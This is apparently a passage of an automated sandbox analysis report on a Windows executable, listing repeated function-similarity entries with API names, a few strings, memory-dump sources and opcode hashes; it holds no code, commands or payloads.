                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F411B920B0D74641EA1CDB51D65427953A1EF89BC8F682034DD4E87BC9EE3EEC048EA0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1266772231-0
                                                                                                                                                                                                                                                        • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                        • Instruction ID: 86fa8839dbafd1997213c79e797dfcfede5c2c931cd79b874171ae9880e23472
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F09626B3855282FB98DBA0F855B362361FFD0709F907035E64EC1894EF6DD508CB50

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60639568F
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606395695
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606391DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF606391E25
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                                                                                                                                                                                                                        • String ID: zip$zipx
                                                                                                                                                                                                                                                        • API String ID: 2713956076-1268445101
                                                                                                                                                                                                                                                        • Opcode ID: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                                                                                                                                                                                                                                        • Instruction ID: 0cbf821f6ab5cffc6f3e156aace09b5ba89f829ef1db94506b2e7ae77d2b68eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2781C362F09B0285FA18DB65E8441BC2361EF44BA8F607235DE1D937D5EE3EE486C790
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                                                                        • String ID: EDIT
                                                                                                                                                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                                                                                                                                                        • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                        • Instruction ID: 8c54e850fe4fb407c46767deb4db424484899b65224e85824b844e033f305dd3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8201A961F08A4741FF289721F821775A350FF98754F543035C94E87695EF6ED544CBA0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4209713984-0
                                                                                                                                                                                                                                                        • Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                        • Instruction ID: 5f928d0adbae1934edcfb11342f9ad345fdfec7466dc00576ad2a355813a35f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B51FA22B19B4396EA58CB15D5443B96390FF54B94F203135EA0EC7AE5DF7EE444C380
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2912839123-0
                                                                                                                                                                                                                                                        • Opcode ID: 7694a187f42c39eb567f0629a824896409d32d05266dde82731a683b3aad9840
                                                                                                                                                                                                                                                        • Instruction ID: 9320feddda3ee4e5460d6edeedc7564ed141f28c385970fe14807d137df2f080
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7694a187f42c39eb567f0629a824896409d32d05266dde82731a683b3aad9840
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA51AE72F1479184FF089BA5D8452AD2322AF44BA4F602636DA1C97BE6DE7EE440D380
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                                                                                                        • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                        • Instruction ID: 30cec888d239690c4c22abe956a1a35a2fec473797a25c0b11d6c2b2a4b08fd7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2314F31E0C50385FE1CAB6595533B962919F42344F687438D64ECB2E7DE2FB805A2D5
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2359106489-0
                                                                                                                                                                                                                                                        • Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                        • Instruction ID: 8648a2523f9a96e13c23c6d419b6bb96127e5840f4e3b95c91bdf1c8ef901cf3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17311E22E1C74285EBA89B25A4481BD6351FF887B0F742231EE5DC36E5DF7DD4458680
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                                                                                                                                        • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                        • Instruction ID: 8afc5a3ab93a097c94ef7d82e804e517fb2dd1852ce37dd0e12a03ce3f749131
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4521AA21E0CB4389EA289F11A40027D67D0FF45B94F346531DA5DC6EA6CFAED8458780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                                                                        • String ID: riched20.dll
                                                                                                                                                                                                                                                        • API String ID: 174490985-3360196438
                                                                                                                                                                                                                                                        • Opcode ID: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                        • Instruction ID: e5323fc5200f61094219197d623b6a0de0ac400b528391af679bd628cd496ca1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F06272A18B4182EB14DF20F8542AEB3A0FF84354F502135E58E82BA4EFBDD648CB50
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2272807158-0
                                                                                                                                                                                                                                                        • Opcode ID: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                        • Instruction ID: aae1c8fcd93cfad05bbaf935a99f5f9b8aac9acd13d1d727d0f107902f108c9e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0341D973A1878686EB148F15E4442A963A1FB847B4F206335DFAD83AE5CFBDD4A18740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2176759853-0
                                                                                                                                                                                                                                                        • Opcode ID: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                        • Instruction ID: 881acb9524a3c4e0481d4d0da6f542ca8d20fcecf1ae60da2b4820f32d59586f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21B673A28B8581EA188B65E44016EB360FB89BE0F246335EBDD43B95DF7DD181C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1203560049-0
                                                                                                                                                                                                                                                        • Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                        • Instruction ID: c921d76990024cb3a2c6216f39333949edddb41f0e6da1d6cdf2966d17198bba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B213A72B1CB8185EE248B24E44126DA360FF88B98F207230EB9EC26A4DF3DD540C784
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3118131910-0
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: vector too long
• API String ID: 3668304517-2873823879
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3587649625-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1746051919-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1392018926-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3322643685-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1173176844-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1017591355-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6063979DB
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1011579015-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
